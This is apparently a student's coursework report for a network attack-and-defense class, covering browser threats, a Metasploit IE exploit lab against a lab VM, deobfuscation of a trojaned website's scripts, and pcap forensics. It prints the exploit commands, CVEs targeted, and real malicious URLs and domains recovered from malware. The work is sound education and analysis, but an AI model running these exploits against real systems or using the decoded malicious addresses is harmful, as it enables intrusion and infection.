20199312 2019-2020-2 《网络攻防实践》第12周作业

《网络攻防实践》第12周作业

总体结构

这个作业属于哪个课程 https://edu.cnblogs.com/campus/besti/19attackdefense
这个作业的要求在哪里 https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10756
我在这个课程的目标是 学习网络攻防知识,增强动手实践能力。
这个作业在哪个具体方面帮助我实现目标 学习Linux网络防御知识。
作业正文 见下
参考文献 [1].网络攻防实践-诸葛建伟

目录
  • 总体结构
  • 1.实践内容
    • 1.1 Web浏览器的技术发展和安全威胁
  • 2.实践过程
    • 任务一:使用攻击机进行浏览器渗透攻击实践。
    • 任务二:网站挂马分析实践
    • 任务三: Web浏览器渗透攻击对抗实验
    • 任务四:Web浏览器遭遇攻击、取证分析
  • 3.学习中遇到的问题及解决
  • 4.实践总结

1.实践内容

1.1 Web浏览器的技术发展和安全威胁

浏览器技术的发展特点主要包括安全性、速度性、扩展性以及隐私性。

20199312 2019-2020-2 《网络攻防实践》第12周作业_第1张图片

Trident 代表作品是IE,俗称IE内核;使用IE内核的浏览器包括、傲游、世界之窗、百度浏览器、兼容模式的浏览器等
WebKit内核 代表作品是Safari、旧版的Chrome
Presto内核 代表作品是Opera,Presto是由Opera Software开发的浏览器排版引擎,它是世界公认最快的渲染速度的引擎。在13年之后,Opera宣布加入谷歌阵营,弃用了 Presto
Blink内核 代表作品是Chrome、Opera;由Google和Opera Software开发的浏览器排版引擎
Gecko内核 代表作品是Firefox,俗称Firefox内核
Chromium内核 这个比较特殊,Chromium是谷歌的开源项目是一款浏览器,Chrome 是Chromium的稳定版。国内的大部分双核浏览器都采用Chromium内核

Web浏览安全威胁位置
(1)针对传输网络的网络安全协议安全威胁
(2)针对Web端系统平台的安全威胁
(3)针对Web浏览器软件及插件程序的渗透攻击威胁
(4)针对互联网用户的社会工程学攻击威胁
网页木马的下载
(1)将木马伪装为页面元素。木马则会被浏览器自动下载到本地
(2)利用脚本运行的漏洞下载木马
(3)利用脚本运行的漏洞释放隐含在网页脚本中的木马
(4)将木马伪装为缺失的组件,或和缺失的组件捆绑在一起(例如:flash播放插件)。这样既达到了下载的目的,下载的组件又会被浏览器自动执行
(5)通过脚本运行调用某些com组件,利用其漏洞下载木马
(6)在渲染页面内容的过程中利用格式溢出释放木马(例如:ani格式溢出漏洞)
(7)在渲染页面内容的过程中利用格式溢出下载木马(例如:flash9.0.115的播放漏洞)
网页木马的执行
(1)利用页面元素渲染过程中的格式溢出执行shellcode进一步执行下载的木马
(2)利用脚本运行的漏洞执行木马
(3)伪装成缺失组件的安装包被浏览器自动执行
(4)通过脚本调用com组件利用其漏洞执行木马
(5)利用页面元素渲染过程中的格式溢出直接执行木马
(6)利用com组件与外部其他程序通讯,通过其他程序启动木马(例如:realplayer10.5存在的播放列表溢出漏洞)
挂马的方式
(1)为了保持网页木马的隐蔽性,网马会选择各种方法隐藏自己,如利用各种标签隐藏自己、代码中使用加密、混淆的技术,目的是降低被发现的可能性
(2)HTML隐藏标签
(3)JavaScript代码中引入
(4)其他网页技术
(5)其他挂马技术
HTML隐藏标签
(1)利用HTML的标签或者一些脚本引入

 // 高宽为0,不会显示

(2)此类在页面的源码中还是很容易发现
JavaScript代码中引入



JavaScript代码中引入
(3)利用URL欺骗,示例代码如下:

 x

2.实践过程

任务一:使用攻击机进行浏览器渗透攻击实践。

//设置攻击程序
use exploit/windows/browser/ie_createobject
//攻击机及靶机地址地址
set rhost 192.168.200.8
set lhost 192.168.3.124
exploit

复制地址http://192.168.200.8:8080/0CePe8WNjhS8Vz
20199312 2019-2020-2 《网络攻防实践》第12周作业_第2张图片

靶机访问访问网址
20199312 2019-2020-2 《网络攻防实践》第12周作业_第3张图片
攻击成功
20199312 2019-2020-2 《网络攻防实践》第12周作业_第4张图片

任务二:网站挂马分析实践

说明:
这个挂马网站现在已经无法访问了,但蜜网课题组的成员保留了最初做分析时所有的原始文件。首先你应该访问 start.html,在这个文件中给出了 new09.htm 的地址,在进入 new09.htm后,每解密出一个文件地址,请对其作32位MD5散列,以散列值为文件名到http://192.168.68.253/scom/hashed/目录下去下载对应的文件(注意:文件名中的英文字母为小写, 且没有扩展名),即为解密出的地址对应的文件。如果解密出的地址给出的是网页或脚本文件,请继续解密;如果解密出的地址是二进程序文件,请进行静态反汇编或动态调试。重复以上过程直到这些文件被全部分析完成。请注意:被散列的文件地址应该是标准的 URL形式,形如 http://xx.18dd.net/a/b.htm,否则会导致散列值计算不正确而无法继续。
问题:
1.试述你是如何一步步地从所给的网页中获取最后的真实代码的?
2.网页和 JavaScript 代码中都使用了什么样的加密方法?你是如何解密的?
3.从解密后的结果来看,攻击者利用了那些系统漏洞?
4.解密后发现了多少个可执行文件?其作用是什么?
5.这些可执行文件中有下载器么?如果有,它们下载了哪些程序?这些程序又是什么作用的?
根据实验指导书获取了钓鱼网站的大致结构
20199312 2019-2020-2 《网络攻防实践》第12周作业_第5张图片

MD5(http://aa.18dd.net/aa/kl.htm,32) = 7f60672dcd6b5e90b6772545ee219bd3 
MD5(http://js.users.51.la/1299644.js,32) = 23180a42a2ff1192150231b44ffdf3d3 

查看hashed文件中对应的文件.
23180a42a2ff1192150231b44ffdf3d3
20199312 2019-2020-2 《网络攻防实践》第12周作业_第6张图片
7f60672dcd6b5e90b6772545ee219bd3
加密方式:Base64编码, xxtea加密(密钥:script),
加解密网站 密钥为script



MS06-014网马:攻击MS06-014安全漏洞,MDAC RDS.Dataspace ActiveX控件远程代码执行漏洞
暴风影音网马:攻击CVE-2007-4816安全漏洞,暴风影音2 mps.dll组件多个缓冲区溢出漏洞
PPStream网马:攻击CVE-2007-4748安全漏洞,PPStream 堆栈溢出
IDA Pro打开这个pps.exe,查看其字符串。
首先这个软件会下载一堆木马文件*.exe。

20199312 2019-2020-2 《网络攻防实践》第12周作业_第7张图片

生成自动运行的文件(":\AutoRun.inf","[AutoRun] open=","AutoRun.inf","shell\Auto\command=")

20199312 2019-2020-2 《网络攻防实践》第12周作业_第8张图片

百度搜霸网马攻击:CVE-2007-4105安全漏洞百度搜霸ActiveX控件远程代码执行漏洞
盗号木马4.Exe释放的特殊文件
$WINDOWS\Fonts\enweafx.fon
伪装为Windows字体文件,内容却是一个加密的可疑URL地址
Url1=EC1A060602485D5D0505055C02064B47420B005C111C5D1907084A0A185D021D01065C130102
使用了一种简单加密方法
特殊文件解密结果
密文=EC 1A 06 06 02 48 5D 5D 05 05 05 5C 02 06 4B 47 42 0B 00 5C 11 1C 5D 19 07 08 4A 0A 18 5D 02 1D 01 06 5C 13 01 02

明文= 68 74 74 70 3A 2F 2F 77 77 77 2E 70 74 39 35 30 79 72 2E 63 6E 2F 6B 75 7A 38 78 6A 2F 70 6F 73 74 2E 61 73 70

明文 http://www.pt950yr.cn/kuz8xj/post.asp

解密方法:XOR 0x72

任务三: Web浏览器渗透攻击对抗实验

打开实验中的ms06-014漏洞的js代码。使用下面的工具进行美化
js混淆解密在线工具
之后得到的js代码如下所示

< html > < head > < title > < /title>
GNNkmzjVHPe

任务四:Web浏览器遭遇攻击、取证分析

任务:通过分析给的网络记录文件,回答下列问题:
(1)列出在捕获文件中的应用层协议类型,是针对哪个或哪些协议的?
(2)列出捕获文件中的 IP 地址、主机名和域名。从这些信息中你能猜出攻击场景的环境配置情况吗?
(3)列出所有网页页面,其中哪些页面包含了可疑的、恶意的js脚本,谁在连接这些页面,目的是什么?
(4)请给出攻击者执行攻击动作的概要描述。
(5)攻击者引入了哪些技巧带来了困难。
(6)攻击者的目标是哪个操作系统?哪个软件?哪个漏洞?如何组织?
(7)shellcode执行了哪些操作?比较他们之间MD5的差异?
(8)在攻击场景中有二进制可执行代码参与吗?目的是什么?
1.列出在捕获文件中的应用层协议类型, 你认为攻击是针对哪个或哪些协议的?
应用层协议主要有
(1)域名系统(DNS)(2)文件传输协议(FTP):用于实现交互式文件传输功能。(3)超文本传输协议(HTTP)(4)简单网络管理协议(SNMP)
攻击的是HTTP协议
20199312 2019-2020-2 《网络攻防实践》第12周作业_第9张图片

2.列出捕获文件中的 IP 地址、主机名和域名。从这些信息中你能猜出攻击场景的环境配置情况吗?
通过统计功能,并在wireshark显示IP地址对应名称.

apt-get install chaosreader //安装工具
chaosreader -r suspicious-time.pcap //读取pcap文件,生成一系列的html文件
for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u //获取源IP和目的IP,以及域名地址

20199312 2019-2020-2 《网络攻防实践》第12周作业_第10张图片

IP地址 域名
192.168.56.50 rapidshare.com.eyu32.ru
192.168.56.51 shop.honeynet.sg
192.168.56.52 sploitme.com.cn

受害机IP地址:10.20.2.15,10.20.3.15,10.20.4.15,10.20.5.1
攻击机为192.168.56.52
3.列出捕获文件中的所有网页页面, 其中哪些页面包含了可疑的、可能是恶意的JavaScript 脚本代码?谁在连接这些页面?请描述恶意网页的攻击目的?
file:///home/kali/Desktop/web/index.html看一下哪个文件大就可疑
session_0006.part_01.html页面如下,后面也有很多和这个页面大致相同的。获取用户用户名和口令的钓鱼页面:
20199312 2019-2020-2 《网络攻防实践》第12周作业_第11张图片

session_0006.part_01.html后面也有很多和这个页面大致相同的
页面如下:

20199312 2019-2020-2 《网络攻防实践》第12周作业_第12张图片
文件很大却只是NOT FOUND显然十分可以,查看源码




404 Not Found

Not Found

The requested URL /fg/show.php?s=3feb5a6b2f was not found on this server.

4.请给出攻击者执行攻击动作的概要描述。
用户访问邮件链接rapidshare.com.eyu32.ru/login.php,用户在不知情的情况下进行注册和登录,个人隐私信息会被传送到sploitme.com.cn/?click=XXXX,再重定向到sploitme.com.cn/fg/show.php?s=XXXX,该链接包含恶意javascript代码,同时返回用户一个伪装的404 not found页面,通过检索程序搜索用户主机漏洞,在用户主机上的恶意软件将访问www.honeynet.org。
5.攻击者的目标是哪个操作系统,哪些应用软件,哪些安全漏洞?如何阻止这些攻击?
追踪TCP 流,猜测这是一个针对Windows XP系统。
20199312 2019-2020-2 《网络攻防实践》第12周作业_第13张图片

3.学习中遇到的问题及解决

  • 问题1:挂马实验文件复杂
  • 问题1解决方案:查看实验指导书,实现实验

4.实践总结

实践很难,好多都不懂,最后一章也是最难的一章。

你可能感兴趣的:(20199312 2019-2020-2 《网络攻防实践》第12周作业)